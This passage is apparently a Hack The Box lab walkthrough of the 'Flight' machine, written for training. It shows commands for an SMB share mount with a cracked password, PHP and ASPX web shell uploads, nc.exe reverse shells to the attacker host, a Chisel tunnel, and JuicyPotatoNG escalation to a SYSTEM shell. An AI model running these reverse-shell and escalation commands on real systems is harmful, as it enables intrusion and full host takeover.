SMB         10.10.11.187    445    G0               Users           READ
SMB         10.10.11.187    445    G0               Web             READ,WRITE 

I mounted the share as C.BUM user

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ sudo mount -t cifs "\\\\$ip\\web" ./web -o 'username=C.BUM,password=Tikkycoll_431012284'

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ ls -al web     
total 4
drwxr-xr-x 2 root root    0 Jul 20  2024 .
drwxrwxr-x 5 kali kali 4096 Jul 20 01:23 ..
drwxr-xr-x 2 root root    0 Jul 20  2024 flight.htb
drwxr-xr-x 2 root root    0 Jul 20  2024 school.flight.htb

Creating a .php file in the share worked, so the next step is to upload a web shell:

┌──(root㉿kali)-[/home/…/machines/Flight/web/school.flight.htb]
└─# touch file.php   

┌──(root㉿kali)-[/home/…/machines/Flight/web/school.flight.htb]
└─# ls
about.html  blog.html  file.php  home.html  images  index.php  lfi.html  styles

┌──(root㉿kali)-[/home/…/machines/Flight/web/school.flight.htb]
└─# cp ../p0wny.php .

http://school.flight.htb/p0wny.php

The web shell disappears after a short while (there is probably a cleanup script), so I used it to upload nc.exe and push a reverse shell back to my Kali machine instead:

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.187] 50122
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\xampp\htdocs\school.flight.htb> 

I also wanted a shell as C.Bum, so I uploaded RunasCs.exe and used the password cracked earlier to spawn a PowerShell as that user, connecting back to my Kali machine:

PS C:\users\Public> .\RunasCs.exe C.BUM Tikkycoll_431012284 Powershell -r 10.10.16.7:8443

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-58a5e$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2364 created in background.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rlwrap nc -lvnp 8443                                      
listening on [any] 8443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.187] 50150

PS C:\Windows\system32> whoami
flight\c.bum

Get the user flag

PS C:\Users\C.Bum> type Desktop\user.txt
ed94451f15400f9a656xxxxxxxxxxxxxxxx

User Flag: ed94451f15400f9axxxxxxxxxxxxx

Looking at the listening ports, a non-default one stands out: 8000, owned by PID 4 (the kernel, i.e. HTTP.sys). It did not show up in the external nmap scan, so it is not reachable from outside, most likely blocked by the host firewall.

PS C:\Users\C.Bum> netstat -ano | findstr TCP

  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       5636
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       924
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       5636
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING       924
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING       664
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8000           0.0.0.0:0              LISTENING       4            

Confirm webapp existence

PS C:\Users\C.Bum> curl http://127.0.0.1:8000 -UseBasicParsing

StatusCode        : 200
StatusDescription : OK
Content           : <!DOCTYPE html>
                    <html>
                        <head>
                            <meta charset="utf-8">
                            <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">                                                       

I then forwarded this port to my Kali machine with Chisel: a reverse tunnel, where the Windows client connects out to my Chisel server and port 8888 on Kali is mapped to 127.0.0.1:8000 on the target.

┌──(kali㉿kali)-[~/…/CPTS/Tools/Pivot/chisel]
└─$ ./chisel_1.9.1_linux_amd64 server -p 9001 --reverse
2024/07/20 02:22:44 server: Reverse tunnelling enabled
2024/07/20 02:22:44 server: Fingerprint zWfxqSWqKl2N1LrFVrpM+V7q9qqtfuYJ5NCiPneI7eM=
2024/07/20 02:22:44 server: Listening on http://0.0.0.0:9001

PS C:\users\Public> .\chisel.exe client 10.10.16.7:9001 R:8888:127.0.0.1:8000
2024/07/20 06:23:04 client: Connecting to ws://10.10.16.7:9001
2024/07/20 06:23:05 client: Connected (Latency 64.1406ms)

Once the client is connected, the server side reports the tunnel:

┌──(kali㉿kali)-[~/…/CPTS/Tools/Pivot/chisel]
└─$ ./chisel_1.9.1_linux_amd64 server -p 9001 --reverse

<snip>
2024/07/20 02:43:21 server: session#1: tun: proxy#R:8888=>8000: Listening

There is a webapp running on IIS 10.0

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ nmap -p8888 localhost -sCV

PORT     STATE SERVICE VERSION
8888/tcp open  http    Microsoft IIS httpd 10.0
|_http-title: Flight - Travel and Tour
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0

http://localhost:8888/

Shell as defaultapppool

PS C:\inetpub> dir

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        9/22/2022  12:24 PM                custerr
d-----        7/20/2024   6:57 AM                development
d-----        9/22/2022   1:08 PM                history
d-----        9/22/2022  12:32 PM                logs
d-----        9/22/2022  12:24 PM                temp
d-----        9/22/2022  12:28 PM                wwwroot 

There is a development folder, and C.Bum has write access to it (W, inherited to files and subfolders via (OI)(CI)):

PS C:\inetpub> icacls development

development flight\C.Bum:(OI)(CI)(W)
<snip>

If the IIS site on port 8000 serves its content from this folder (the name suggests so, and requesting the uploaded file below confirms it), I can write an ASPX web shell there. I used this one:

https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx

I downloaded the shell to my kali and then uploaded it to the windows box

PS C:\inetpub\development> curl 10.10.16.7/cmd.aspx -o .\cmd.aspx

http://localhost:8888/cmd.aspx

Get a shell: from the ASPX web shell I ran the nc.exe dropped earlier to connect back to a new listener.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rlwrap nc -lvnp 9001
listening on [any] 9001 ...


PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool

Shell as Administrator

PS C:\Users\Public> whoami /priv

PRIVILEGES INFORMATION
----------------------

<snip>
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

Since the application-pool identity holds SeImpersonatePrivilege, I can escalate to SYSTEM with JuicyPotatoNG (the original JuicyPotato no longer works on this build, Windows Server 2019 / 17763; -t * tells the NG version to try both CreateProcessWithTokenW and CreateProcessAsUser, and -p/-a give the program and arguments to launch as SYSTEM):

PS C:\Users\Public> .\JuicyPotatoNG.exe -t * -p "C:\Users\Public\nc.exe" -a "10.10.16.7 5555 -e PowerShell"

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.187] 50363

PS C:\> whoami
nt authority\system
PS C:\> type C:\Users\Administrator\Desktop\root.txt
a884480417f1f666bf6xxxxxxxxxxxxxx

Root Flag: a884480417f1f666xxxxxxxxxxxx

References

  • Places of Interest in Stealing NetNTLM Hashes (Blog of Osanda)
  • Releases · antonioCoco/JuicyPotatoNG (GitHub)